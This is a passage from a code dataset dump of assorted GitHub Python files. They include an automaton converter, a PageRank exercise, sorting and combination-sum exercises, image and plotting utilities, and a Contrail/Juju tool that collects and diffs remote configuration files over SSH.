grammy[sym] == [] and grammy[sym] not in open_list and closed_list):\n open_list.append(grammy[sym])\n grammy[sym] = []\n for i, node in enumerate(new_automata):\n d_automata.add_node(node, initial=node in a1.initial_state,\n final=closed_list[i][len(closed_list[i])-1] in a1.final_states)\n\n for node in new_automata:\n for edge in new_automata[node]:\n if(new_automata[node][edge] == []):\n continue\n neighbor = \"\".join(new_automata[node][edge])\n d_automata.add_edge(node, neighbor, label=edge)\n\n\ndef wordProcessing(rfile, d_automata, input):\n initial_state = rfile[0][2]\n current = initial_state\n temp = \"\"\n for letter in input:\n if (letter not in rfile[0][1]):\n return \"A palavra contém uma letra que não está na gramática!\"\n for neighbor in d_automata.neighbors(current):\n edges = d_automata.get_edge_data(current, neighbor)\n for sym in edges:\n if(letter == edges[sym][\"label\"]):\n temp = neighbor\n current = temp\n\n for node in d_automata.nodes(data=True):\n if(node[0] == current):\n return node[1][\"final\"]\n return False\n\n\nfile = sys.argv[1]\nword = sys.argv[2]\nrfile = readFile(file)\nnd_automata = nx.MultiDiGraph()\nd_automata = nx.MultiDiGraph()\n\nnd2d_converter(rfile, nd_automata)\nprint(wordProcessing(rfile, d_automata, word))\n\nmapping = dict(zip(d_automata.nodes(), \"pqrstuvwxyzabcdefghijklmno\"))\n\nd_automata = nx.relabel_nodes(d_automata, mapping)\nfinal = list(filter(lambda x: x[1]['final'] ==\n True, nd_automata.nodes(data=True)))\ninitial = list(filter(lambda x: x[1]['initial'] ==\n True, nd_automata.nodes(data=True)))[0][0]\ninitial_arrow = nd_automata.add_node(\n \".\", fillcolor=\"white\", shape=\"point\", fixedsize=False, width=0, label=\"\", size=1)\nnd_automata.add_edge(\".\", initial)\n\nfor f in final:\n nd_automata.nodes[f[0]]['shape'] = 'doublecircle'\nA = nx.nx_agraph.to_agraph(nd_automata)\nA.layout(prog=\"dot\")\nA.draw(\"automatons/nd_automata.png\")\n\nfinal = list(filter(lambda x: x[1]['final'] ==\n True, d_automata.nodes(data=True)))\ninitial = list(filter(lambda x: x[1]['initial'] ==\n True, d_automata.nodes(data=True)))[0][0]\ninitial_arrow = d_automata.add_node(\n \".\", fillcolor=\"white\", shape=\"point\", fixedsize=False, width=0, label=\"\", size=1)\nd_automata.add_edge(\".\", initial)\n\nfor f in final:\n d_automata.nodes[f[0]]['shape'] = 'doublecircle'\nB = nx.nx_agraph.to_agraph(d_automata)\nB.layout(prog=\"dot\")\nB.draw(\"automatons/d_automata.png\")\n","repo_name":"jvzmarmentini/automaton-app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17958005510","text":"\"\"\"Common Utility Functions\"\"\"\n# pylint: disable=E1101,W0212,C0302,C0103,C0415,C0121\nfrom typing import Tuple, Union, Dict, Optional\nimport warnings\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom .common import ArrayLike\n\ndef plot_3dim_decomposition(\n Z:Union[pd.DataFrame, np.ndarray],\n y_labels:ArrayLike,\n y_names:Dict,\n save_name:Optional[str] = None\n ) -> None:\n \"\"\"Plots a 3-dimensional decomposition of the given data.\n\n Parameters:\n Z (Union[pd.DataFrame, np.ndarray]): The input data.\n y_labels (ArrayLike): The labels for the data points.\n y_names (Dict): A dictionary mapping label indices to their names.\n save_name (Optional[str], optional): The name to save the plot as. Defaults to None.\n\n Returns:\n None\n \"\"\"\n warnings.warn('This method is deprecated.', DeprecationWarning, stacklevel=2)\n if len(y_names) > 2:\n cmap = 'plasma_r'\n else:\n cmap = 'viridis'\n fig, axs = plt.subplots(1, 3, figsize = (16,4))\n fig.subplots_adjust(hspace=0, wspace=0.3)\n scatter = axs[0].scatter(Z[:,0], Z[:,1],\\\n c=y_labels, alpha=0.5, cmap=cmap)\n legend = axs[0].legend(*scatter.legend_elements(), loc='best')\n for n in y_names.keys():\n legend.get_texts()[n].set_text(y_names[n])\n axs[0].set_xlabel('x', fontsize = 12)\n axs[0].set_ylabel('y', fontsize = 12)\n scatter = axs[1].scatter(Z[:,1], Z[:,2],\\\n c=y_labels, alpha=0.5, cmap=cmap)\n legend = axs[1].legend(*scatter.legend_elements(), loc='best')\n for n in y_names.keys():\n legend.get_texts()[n].set_text(y_names[n])\n axs[1].set_xlabel('y', fontsize = 12)\n axs[1].set_ylabel('z', fontsize = 12)\n axs[2].scatter(Z[:,0], Z[:,2],\\\n c=y_labels, alpha=0.5, cmap=cmap)\n legend = axs[2].legend(*scatter.legend_elements(), loc='best')\n for n in y_names.keys():\n legend.get_texts()[n].set_text(y_names[n])\n axs[2].set_xlabel('x', fontsize = 12)\n axs[2].set_ylabel('z', fontsize = 12)\n if save_name is not None:\n plt.savefig(save_name+'_3dim.png', dpi=300, bbox_inches=\"tight\")\n plt.show()\n\ndef encode_classification_error_vector(\n y_true:Union[pd.Series, np.ndarray],\n y_pred:Union[pd.Series, np.ndarray]\n ) -> Tuple[np.ndarray, Dict]:\n \"\"\"Encodes the classification error vector.\n\n Args:\n y_true (Union[pd.Series, np.ndarray]): The true classification labels.\n y_pred (Union[pd.Series, np.ndarray]): The predicted classification labels.\n\n Returns:\n Tuple[np.ndarray, Dict]: A tuple containing the encoded error vector and the error labels.\n\n Example:\n >>> y_true = np.array([1, 0, 1, 0])\n >>> y_pred = np.array([0, 0, 1, 1])\n >>> encode_classification_error_vector(y_true, y_pred)\n (array([3, 4, 1, 2]), {0: 'FP', 1: 'FN', 2: 'TP', 3: 'TN'})\n \"\"\"\n warnings.warn('This method is deprecated.', DeprecationWarning, stacklevel=2)\n error_vector = (y_true * 2) - y_pred\n error_vector = np.where(error_vector==0, 4, error_vector + 1)\n error_vector = np.where(error_vector==3, 0, error_vector - 1)\n error_vector = np.where(error_vector==3, error_vector, error_vector + 1)\n error_labels = {0:'FP', 1:'FN', 2:'TP', 3:'TN'}\n return error_vector, error_labels\n","repo_name":"smasis001/Machine-Learning-Datasets","sub_path":"machine_learning_datasets/deprecated.py","file_name":"deprecated.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4043695368","text":"import os\nimport random\nimport re\nimport sys\n\nDAMPING = 0.85\nSAMPLES = 10000\n\n\ndef main():\n if len(sys.argv) != 2:\n sys.exit(\"Usage: python pagerank.py corpus\")\n corpus = crawl(sys.argv[1])\n ranks = sample_pagerank(corpus, DAMPING, SAMPLES)\n print(f\"PageRank Results from Sampling (n = {SAMPLES})\")\n for page in sorted(ranks):\n print(f\" {page}: {ranks[page]:.4f}\")\n ranks = iterate_pagerank(corpus, DAMPING)\n print(f\"PageRank Results from Iteration\")\n for page in sorted(ranks):\n print(f\" {page}: {ranks[page]:.4f}\")\n\n\ndef crawl(directory):\n \"\"\"\n Parse a directory of HTML pages and check for links to other pages.\n Return a dictionary where each key is a page, and values are\n a list of all other pages in the corpus that are linked to by the page.\n \"\"\"\n pages = dict()\n\n # Extract all links from HTML files\n for filename in os.listdir(directory):\n if not filename.endswith(\".html\"):\n continue\n with open(os.path.join(directory, filename)) as f:\n contents = f.read()\n links = re.findall(r\"]*?)href=\\\"([^\\\"]*)\\\"\", contents)\n pages[filename] = set(links) - {filename}\n\n # Only include links to other pages in the corpus\n for filename in pages:\n pages[filename] = set(\n link for link in pages[filename]\n if link in pages\n )\n\n return pages\n\n\ndef transition_model(corpus, page, damping_factor):\n \"\"\"\n Return a probability distribution over which page to visit next,\n given a current page.\n\n With probability `damping_factor`, choose a link at random\n linked to by `page`. With probability `1 - damping_factor`, choose\n a link at random chosen from all pages in the corpus.\n \"\"\"\n res = {}\n\n pages_number = len(corpus)\n base_probability = (1 - damping_factor) / pages_number\n\n links = corpus[page]\n links_number = len(links)\n\n if not links_number:\n probability = 1 / damping_factor\n for p in corpus:\n res[p] = probability\n else:\n for p in corpus:\n res[p] = base_probability\n\n added_probability = damping_factor / links_number\n\n for p in links:\n res[p] += added_probability\n\n return res\n\n\ndef sample_pagerank(corpus, damping_factor, n):\n \"\"\"\n Return PageRank values for each page by sampling `n` pages\n according to transition model, starting with a page at random.\n\n Return a dictionary where keys are page names, and values are\n their estimated PageRank value (a value between 0 and 1). All\n PageRank values should sum to 1.\n \"\"\"\n res = {}\n\n for p in corpus:\n res[p] = 0\n\n page = random.choice(list(corpus))\n\n for _ in range(n):\n res[page] += 1\n tm = transition_model(corpus, page, damping_factor)\n\n random_value = random.random()\n prob_limit = 0\n next_page = 0\n\n for p, prob in tm.items():\n prob_limit += prob\n if random_value <= prob_limit:\n next_page = p\n break\n\n page = next_page\n\n for p in res:\n res[p] /= n\n\n return res\n\n\ndef iterate_pagerank(corpus, damping_factor):\n \"\"\"\n Return PageRank values for each page by iteratively updating\n PageRank values until convergence.\n\n Return a dictionary where keys are page names, and values are\n their estimated PageRank value (a value between 0 and 1). All\n PageRank values should sum to 1.\n \"\"\"\n res = {}\n starting_probability = 1 / len(corpus)\n\n for p in corpus:\n res[p] = [starting_probability, 0]\n\n base_probability = (1 - damping_factor) / len(corpus)\n\n while True:\n for p1 in res:\n added_probability = 0\n for p2 in corpus:\n if p1 in corpus[p2]:\n added_probability += res[p2][0] / len(corpus[p2])\n res[p1][1] = base_probability + damping_factor * added_probability\n\n if all(abs(res[p][0] - res[p][1]) < 0.001 for p in res):\n break\n\n for p in res:\n res[p][0] = res[p][1]\n\n total = sum(v[1] for v in res.values())\n return {key: value[1] / total for key, value in res.items()}\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bonato-simone/CS50AI","sub_path":"2-uncertainty/pagerank/pagerank.py","file_name":"pagerank.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22117861951","text":"import os\nfrom typing import List, Tuple\nfrom PIL import Image\n\ndef image_file_list_io(input_folder:str, output_folder:str)->Tuple[list,list]:\n '''\n Get all images in the input folder and sub directories recursively, and generate output path with the same structure.\n args:\n input_folder - Path for input folder.\n output_folder - Path for output folder.\n return:\n Two lists containing pairs of pathes for input files and output files.\n '''\n input_file_list = list()\n output_file_list = list()\n for file_name in os.listdir(input_folder):\n current_path = os.path.join(input_folder, file_name)\n target_path = os.path.join(output_folder, file_name)\n if os.path.isdir(current_path):\n sub_in, sub_out = image_file_list_io(current_path, target_path)\n input_file_list.extend(sub_in)\n output_file_list.extend(sub_out)\n else:\n try: Image.open(current_path).close()\n except: continue\n if not os.path.exists(os.path.dirname(target_path)):\n os.makedirs(os.path.dirname(target_path))\n input_file_list.append(current_path)\n output_file_list.append(target_path)\n return input_file_list, output_file_list\n\ndef image_file_list_input_only(input_folder:str)->list:\n '''\n Get all images in the input folder and sub directories recursively.\n args:\n input_folder - Path for input folder.\n return:\n List containing pathes for input files.\n '''\n input_file_list = list()\n for file_name in os.listdir(input_folder):\n current_path = os.path.join(input_folder, file_name)\n if os.path.isdir(current_path):\n sub_in = image_file_list_input_only(current_path)\n input_file_list.extend(sub_in)\n else:\n try: Image.open(current_path).close()\n except: continue\n input_file_list.append(current_path)\n return input_file_list","repo_name":"zhouyulab/leafnet","sub_path":"leafnet/leafnet_libs/image_file_list.py","file_name":"image_file_list.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"12684483776","text":"'''\n冒泡排序\n 1. 从当前元素起,向后依次比较每一对相邻元素,若逆序则交换 */\n 2. 对所有元素均重复以上步骤,直至最后一个元素 */\n'''\narr01 = [2, 4, 3, 5, 9, 8, 6, 4, 2, 1, 8, 19, 22, 28, 28, 16, 12]\narr01.sort()# 方法1:直接使用排序函数\nprint(arr01)\n#print(len(arr01))\nfor i in range(1,len(arr01)):#冒泡排序\n for j in range(0,len(arr01)-i):\n if arr01[j] > arr01[j+1]:\n arr01[j],arr01[j+1] = arr01[j+1],arr01[j]\nprint(arr01)\n\n#思路2 排序,定义null列表,通过每次取出最小值放入null列表中进行排序\narr02 = []\nwhile True:\n if len(arr01) != 0:\n arr02.append(min(arr01))#每次取出列表中的最小值放入空列表中\n #print(arr02)\n arr01.remove(min(arr01))#然后源列表移除最小值\n else:\n break\nprint(arr02)\n\narr01 = [2, 4, 3, 5, 9, 8, 6, 4, 2, 1, 8, 19, 22, 28, 28, 16, 12]\narr02 = []\nfor i in range(len(arr01)):\n arr02.append(min(arr01)) # 每次取出列表中的最小值放入空列表中\n # print(arr02)\n arr01.remove(min(arr01)) # 然后源列表移除最小值\nprint(arr02)\n\n'''\n选择排序:将列表分为有序区和无序区\n'''\narr01 = [2, 4, 3, 5, 9, 8, 6, 4, 2, 1, 8, 19, 22, 28, 28, 16, 12]\nfor i in range(len(arr01)-1):\n index = arr01.index( min(arr01[i:]))#从无序区找出最小值的下标\n if index < i:\n index = i\n for j in range(i+1,len(arr01)-1) :\n if arr01[j] < arr01[index]:\n index = j\n if index != i:\n arr01[i],arr01[index] = arr01[index],arr01[i]#最小值依次放入有序区\nprint(arr01)\n\narr01 = [2, 4, 3, 5, 9, 8, 6, 4, 2, 1, 8, 19, 22, 28, 28, 16, 12]\nfor i in range(len(arr01)-1):\n index = i#假设第一个值为最小值的下标\n for j in range(i,len(arr01)-1):\n if arr01[j+1] < arr01[index]:#从下一个位置开始和最小值对比,若小于最小值,则交换\n index = j+1\n arr01[i], arr01[index] = arr01[index], arr01[i]\nprint(arr01)\n\narr01 = [2, 4, 3, 5, 9, 8, 6, 4, 2, 1, 8, 19, 22, 28, 28, 16, 12]\nfor i in range(len(arr01)-1):\n index = arr01.index( min(arr01[i:]),i )#从i开始,这样已经排序的下标就不会影响找出来的下标了\n arr01[i], arr01[index] = arr01[index], arr01[i]\nprint(arr01)\n\n\n","repo_name":"nana0908/lucky_pydemo","sub_path":"venv/FunctionApplication/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74576849445","text":"hodowla = [\n {'zwierze': 'kot', 'ilosc': 10, 'cena': 100},\n {'zwierze': 'pies', 'ilosc': 20, 'cena': 500},\n {'zwierze': 'kura', 'ilosc': 40, 'cena': 25}\n]\n\nsuma = 0\nfor poz in hodowla:\n il = poz['ilosc']\n c = poz['cena']\n sum = suma + (c * il)\n # print(c)\n # print(suma)\n #print(poz)\nprint(suma)\n","repo_name":"gosiamalgosia/nauka_python","sub_path":"koszyk2.py","file_name":"koszyk2.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"bs","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1828286685","text":"import json\nimport re\nfrom pathlib import Path\n\n_canonicalize_regex = re.compile(r\"[-_.]+\")\n\n\ndef canonicalize_name(name):\n return _canonicalize_regex.sub(\"-\", name).lower()\n\n\ndef _get_index_or_default(li, value, *, default):\n try:\n return li.index(value)\n except ValueError:\n return default\n\n\ndef sort_key(theme):\n # Normalize names\n theme[\"pypi\"] = canonicalize_name(theme[\"pypi\"])\n\n # Determine the \"rank\" of a theme. Approximately ordered as:\n # - featured\n # - third-party themes\n # - default themes\n featured = [\"alabaster\", \"sphinx-rtd-theme\"]\n if theme[\"pypi\"] == \"sphinx\":\n rank = _get_index_or_default(\n featured, theme[\"config\"], default=len(featured) + 1\n )\n else:\n rank = _get_index_or_default(featured, theme[\"pypi\"], default=len(featured))\n\n return (rank, theme[\"pypi\"])\n\n\ndef main():\n path = Path(\"themes.json\")\n\n with path.open(\"r\") as f:\n data = json.load(f)\n\n data[\"themes\"].sort(key=sort_key)\n\n with path.open(\"w\") as f:\n json.dump(data, f, sort_keys=True, indent=2)\n f.write(\"\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ikingye/sphinx-themes.org","sub_path":"tools/sort-json.py","file_name":"sort-json.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"12863347173","text":"\"\"\" Grab contrail config files and compare them against previous versions\"\"\"\nimport subprocess\nimport sys\nimport os\nimport shutil\nimport filecmp\nimport pathlib\nimport argparse\nimport base64\nimport re\nimport yaml\nimport logging\nfrom logging.handlers import RotatingFileHandler\nfrom juju import loop\nfrom juju.model import Model\n\n\ndef logging_func(mode):\n \"\"\"Instantiate Logging.\"\"\"\n directory = os.getcwd()\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n if not os.path.exists(directory + '/logs'):\n os.makedirs(directory + '/logs')\n handler_file = RotatingFileHandler(directory + '/logs/contrail_config_diff.log',\n maxBytes=100000, backupCount=10\n )\n handler_file.setLevel(logging.INFO)\n handler_stout = logging.StreamHandler(sys.stdout)\n handler_stout.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(message)s')\n handler_file.setFormatter(formatter)\n logger.addHandler(handler_file)\n if mode == 'maint':\n logger.addHandler(handler_stout)\n return logger\n\n\ndef read_file(file_path):\n \"\"\"get text from a file\"\"\"\n with open(file_path) as file_handle:\n file_contents = file_handle.read()\n return file_contents\n\n\ndef read_conf_files(unit_ip_file, remote_files, juju_controller):\n \"\"\"load settings from the specified yaml files\"\"\"\n conf_files = yaml.safe_load(read_file(remote_files))\n unit_ips = yaml.safe_load(read_file(unit_ip_file))\n juju_controller = yaml.safe_load(read_file(juju_controller))\n return unit_ips, conf_files, juju_controller\n\n\ndef write_file(contents, file_location):\n \"\"\"write arbitrary strings to a file\"\"\"\n with open(file_location, 'w+') as write_fh:\n write_fh.write(contents)\n os.chmod(file_location, 0o600)\n\n\ndef password_wipe(text_blob):\n \"\"\"remove passwords from text\"\"\"\n new_blob = []\n for line in text_blob.splitlines():\n if 'password' in line.lower() or 'secret' in line.lower():\n if 'auth_type' not in line.lower():\n line = re.split('=| ', line)\n new_blob.append(line[0] + ' #PASSWORD REMOVED#')\n else:\n new_blob.append(line)\n else:\n new_blob.append(line)\n return '\\n'.join(new_blob)\n\n\ndef get_remote_file(remote_ip, file_location, username):\n \"\"\"grab the text contents of a file on a remote system via SSH.\n as most contrail / openstack config files are only root readable\n do this via a sudo cat\"\"\"\n try:\n pipes = (subprocess.Popen(['ssh', '-o StrictHostKeyChecking=no',\n username + '@{}'.format(remote_ip),\n 'sudo', 'cat', file_location\n ],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n )\n std_out, std_err = pipes.communicate(timeout=20)\n except subprocess.TimeoutExpired:\n LOGGER.info(\"No answer from '{}', skipping.\".format(remote_ip))\n return \"HOST DOWN\"\n if pipes.returncode != 0:\n if b'No such file or directory' in std_err:\n return ''\n raise Exception(std_err.strip())\n return std_out.decode('utf-8')\n\n\ndef scrape_server(in_params):\n \"\"\"grab remote files from a server and save to a local directory,\n if the directory doesn't exist, create it and, if required, it's parents\"\"\"\n server_ip, component, files, dir_path, username, inc_passwords = in_params\n LOGGER.info(\"from '{}'\".format(server_ip))\n for conf_loc in files[component]:\n conf_file = get_remote_file(server_ip, conf_loc, username)\n if conf_file == \"HOST DOWN\":\n break\n if not inc_passwords:\n conf_file = password_wipe(conf_file)\n file_name = conf_loc.replace('/', '_')\n local_path = '{}/{}/{}'.format(dir_path, component, server_ip)\n pathlib.Path(local_path).mkdir(parents=True, exist_ok=True)\n pathlib.Path(local_path).chmod(0o700)\n write_file(str(conf_file), local_path + '/' + file_name)\n\n\ndef write_config_files(unit_ips, files, dir_path, username, inc_passwords):\n \"\"\"for components endpoints in 'unit_ips' grab config in 'files'\n and dump the file to 'dir'\"\"\"\n for component, server_ips in unit_ips.items():\n LOGGER.info(\"getting '{}' data\".format(component))\n for server_ip in server_ips:\n scrape_server((server_ip, component, files, dir_path, username, inc_passwords))\n if 'repos' in dir_path:\n commit_git(dir_path)\n\n\ndef get_file_diffs(dcmp, file_name, diff_mode):\n \"\"\"Echo file diffs to stdout\"\"\"\n left_file = dcmp.left + '/' + file_name\n right_file = dcmp.right + '/' + file_name\n if diff_mode == 'context':\n diff_flag = '-c'\n elif diff_mode == 'unified':\n diff_flag = '-u'\n else:\n diff_flag = '--normal'\n diff = (subprocess.Popen(['diff', diff_flag, left_file, right_file],\n stdout=subprocess.PIPE).communicate()[0]\n )\n print('=' * 100)\n print(\"{}\\n{}\".format(left_file, right_file))\n print(diff.decode('utf-8'))\n\n\ndef recurse_diff_files(dcmp, diff_mode):\n \"\"\"Recurse through all subdirs of 'dcmp' filecmp.dircmp object.\n Return all the files missing and print a diff of all files that are different\"\"\"\n if dcmp.diff_files:\n for file_name in dcmp.diff_files:\n get_file_diffs(dcmp, file_name, diff_mode)\n if dcmp.left_only:\n print('=' * 100)\n print(\"Files missing in the '{}' directory: \".format(dcmp.right))\n print('\\n'.join(dcmp.left_only))\n if dcmp.right_only:\n print('=' * 100)\n print(\"Files missing in the '{}' directory: \".format(dcmp.left))\n print('\\n'.join(dcmp.right_only))\n for sub_dcmp in dcmp.subdirs.values():\n recurse_diff_files(sub_dcmp, diff_mode)\n\n\ndef diff_files(old_dir, new_dir, diff_mode):\n \"\"\"Instantiate a file compare object against the specified directories.\n call 'recurse_diff_files()' to compare all files in those directories\"\"\"\n if os.path.exists(old_dir) and os.path.exists(new_dir):\n dcmp = filecmp.dircmp(old_dir, new_dir)\n recurse_diff_files(dcmp, diff_mode)\n else:\n LOGGER.info(\"missing directory: '{}' or '{}'\\nstopping diff\".format(old_dir, new_dir))\n\n\ndef parse_juju_controller(juju_controller):\n model_name = list(juju_controller.keys())[0]\n ca_cert = juju_controller[model_name]['details']['ca-cert']\n uuid = juju_controller[model_name]['models']['dv-test']['model-uuid']\n api_endpoint = juju_controller[model_name]['details']['api-endpoints'][0]\n username = juju_controller[model_name]['account']['user']\n return model_name, uuid, ca_cert, api_endpoint, username\n\n\nasync def get_juju_status_api(model_name, uuid, ca_cert, api_endpoint, username):\n \"\"\"Connect to current juju model and obtain a status.\"\"\"\n password = base64.b64decode(read_file('./configs/secrets')).decode('utf-8')\n model = Model()\n await model.connect(\n api_endpoint,\n uuid,\n username,\n password,\n ca_cert,\n )\n status = await model.get_status()\n await model.disconnect()\n return status\n\n\ndef parse_juju_status_api(juju_status):\n \"\"\"parse juju status and generate a list of application IPs\n to be used in a config file that defines the model\"\"\"\n ip_unit_map = {}\n for juju_app, juju_app_data in juju_status.applications.items():\n if 'contrail' in juju_app:\n if juju_app_data.subordinate_to:\n for parent_app in juju_app_data.subordinate_to:\n parent_app_name = juju_status['applications'][parent_app]\n std_app_name = re.split(':|/', parent_app_name.charm)[-1]\n std_app_name = '-'.join(std_app_name.split('-')[0:-1])\n for unit_data in juju_status['applications'][parent_app]['units'].values():\n ip_unit_map.setdefault(std_app_name, set()).add(unit_data.public_address)\n else:\n std_app_name = re.split(':|/', juju_app_data.charm)[-1]\n std_app_name = '-'.join(std_app_name.split('-')[0:-1])\n for unit_data in juju_app_data.units.values():\n ip_unit_map.setdefault(std_app_name, set()).add(unit_data.public_address)\n return ip_unit_map\n\n\ndef get_juju_charm_versions(juju_status):\n \"\"\"parse juju status from the model and return a list of installed\n applications and their versions\"\"\"\n status_list = []\n format_string = '{:25} {:50} {:30} {:10}'\n status_list.append(format_string.format('# application', 'charm', 'unit', 'software version'))\n for juju_app, juju_app_data in juju_status.applications.items():\n for unit, unit_data in juju_app_data.units.items():\n status_list.append(format_string.format(juju_app, juju_app_data.charm,\n unit, unit_data.workload_version\n ))\n return '\\n'.join(status_list) + '\\n'\n\ndef check_dir(output_dir):\n \"\"\"warn if output dir already exists, delete it if user accepts this\"\"\"\n if os.path.exists(output_dir):\n while True:\n answer = input(\"output directory already exists, \"\n \"old files will be deleted, proceed?, y/n:\"\n )\n if answer.lower() not in ('y', 'n'):\n print(\"'y' or 'n' only please\")\n else:\n break\n if answer.lower() == 'n':\n exit()\n shutil.rmtree(output_dir)\n pathlib.Path(output_dir).mkdir(parents=True, exist_ok=True)\n\n\ndef commit_git(output_dir):\n \"\"\"commit changes to the repo\n TODO: move to native from a sub process\"\"\"\n os.chdir(output_dir)\n pipes = (subprocess.Popen(['git', 'add', './'],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n )\n std_out, std_err = pipes.communicate()\n LOGGER.info(std_out)\n LOGGER.info(std_err)\n pipes = (subprocess.Popen(['git', 'commit', '-m', 'automated commit'], \n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n )\n std_out, std_err = pipes.communicate()\n LOGGER.info(std_out)\n LOGGER.info(std_err)\n\n\ndef check_dir_git(output_dir):\n \"\"\"initialize git repo if not done already\n TODO: move to native from a sub process\"\"\"\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n if not os.path.exists(output_dir + '/.git'):\n pipes = (subprocess.Popen(['git', 'init', output_dir],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n )\n std_out, std_err = pipes.communicate()\n LOGGER.info(std_out)\n LOGGER.info(std_err)\n\n\ndef cli_grab():\n \"\"\"take stuff from cli, output it in a dict\"\"\"\n parser = argparse.ArgumentParser(description=\"Grab contrail configs and compare with others. \"\n \"Use for planned work verification and regular\"\n \" checks on config sanity.\")\n parser.add_argument(\"ips_file\",\n help=\"Location of YAML file containing Contrail component IPs\")\n parser.add_argument(\"config_file\",\n help=\"Location of YAML file containing config file paths\")\n parser.add_argument(\"juju_file\",\n help=\"Location of YAML file containing 'juju show-controller' output'\")\n parser.add_argument(\"-g\", \"--get-ips\", action=\"store_true\",\n help=\"Generate ips_file from 'juju status'\")\n parser.add_argument(\"-d\", \"--diff-only\", action=\"store_true\",\n help=\"Only compare. Files must exist from previous runs'\")\n parser.add_argument(\"-r\", \"--repo-name\",\n help=\"directory where files are stored in git, use\"\n \" when regularly using script to track configs\"\n \" over time. mutually exlusive with '-m'\"\n \"directory is local to './repos/'\")\n parser.add_argument(\"-m\", \"--maint-name\",\n help=\"directory where files are stored as plain text,\"\n \"for comparision before and after a maintenance\"\n \" mutually exlusive with '-r'\"\n \"files are stored in './maintenances/'\")\n parser.add_argument(\"-w\", \"--when\",\n help=\"use with '-m', indicate whether capture is 'before'\"\n \"or 'after' the maintainance or if you want to 'diff\"\n \"the files from previous captures\")\n parser.add_argument(\"-u\", \"--username\", default=\"ubuntu\",\n help=\"Username to SSH to contrail components. Default: 'ubuntu'\")\n parser.add_argument(\"-p\", \"--inc-passwords\", action=\"store_true\",\n help=\"Include passwords in the files grabbed\")\n args = vars(parser.parse_args())\n if args['repo_name'] and args['maint_name']:\n print(\"please use only one of '-r' and '-m'\")\n exit()\n elif not args['repo_name'] and not args['maint_name']:\n print(\"please specify one of '-r' and '-m'\")\n exit()\n elif args['maint_name'] and not args['when']:\n print(\"please specify -w with 'before' or 'after\")\n exit()\n return args\n\n\ndef main(args):\n \"\"\"main script body\"\"\"\n if args['when'] == 'diff':\n file_dir = './maintenances/' + args['maint_name'] + '/'\n diff_files(file_dir + 'before', file_dir + 'after', 'normal')\n exit()\n unit_ips, conf_files, juju_controller = read_conf_files(args['ips_file'],\n args['config_file'],\n args['juju_file']\n )\n LOGGER.info(\"getting juju status\")\n juju_status = loop.run(get_juju_status_api(*parse_juju_controller(juju_controller)))\n if args['get_ips']:\n LOGGER.info(\"generating and writing component IPs file from 'juju status' output\")\n unit_ips = parse_juju_status_api(juju_status)\n write_file(yaml.dump(unit_ips, default_flow_style=False), args['ips_file'])\n if args['maint_name']:\n output_dir = './maintenances/' + args['maint_name'] + '/' + args['when']\n check_dir(output_dir)\n elif args['repo_name']:\n output_dir = './repos/' + args['repo_name']\n check_dir_git(output_dir)\n write_file(get_juju_charm_versions(juju_status), output_dir + '/juju_apps.txt')\n write_config_files(unit_ips, conf_files,\n output_dir, args['username'], args['inc_passwords']\n )\n if args['maint_name'] and args['when'] == 'after':\n compare_dir = './maintenances/' + args['maint_name'] + '/before'\n diff_files(compare_dir, output_dir, 'normal')\n\n\nif __name__ == '__main__':\n os.chdir('/'.join(os.path.realpath(__file__).split('/')[:-1]))\n ARGS = cli_grab()\n if ARGS['maint_name']:\n MODE = 'maint'\n else:\n MODE = 'repo'\n LOGGER = logging_func(MODE)\n main(ARGS)\n","repo_name":"dannyvernals/contrail-config-diff","sub_path":"contrail_config_diff.py","file_name":"contrail_config_diff.py","file_ext":"py","file_size_in_byte":15370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10294036888","text":"def resolve():\n '''\n code here\n '''\n import math\n N = int(input())\n As = [int(item) for item in input().split()]\n\n \n res = 2000**2\n\n for mid in range(min(As), max(As)+1):\n temp_res = 0\n for item in As:\n temp_res += (item - mid)**2\n res = min(temp_res, res)\n print(res)\n\nif __name__ == \"__main__\":\n resolve()\n","repo_name":"staguchi0703/prob_boot_camp_medium","sub_path":"ARC059C/resolve.py","file_name":"resolve.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13351267441","text":"class Solution:\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n ans = []\n st = []\n def getcombination(ind,target):\n if target == 0:\n ans.append(st[:])\n return\n if ind == len(candidates):\n return\n if candidates[ind]<=target:\n st.append(candidates[ind])\n getcombination(ind,target-candidates[ind])\n st.pop()\n getcombination(ind+1,target)\n getcombination(0,target)\n return ans","repo_name":"GANESHALIAS/project-leet","sub_path":"0039-combination-sum/0039-combination-sum.py","file_name":"0039-combination-sum.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"43590006847","text":"import re\nimport 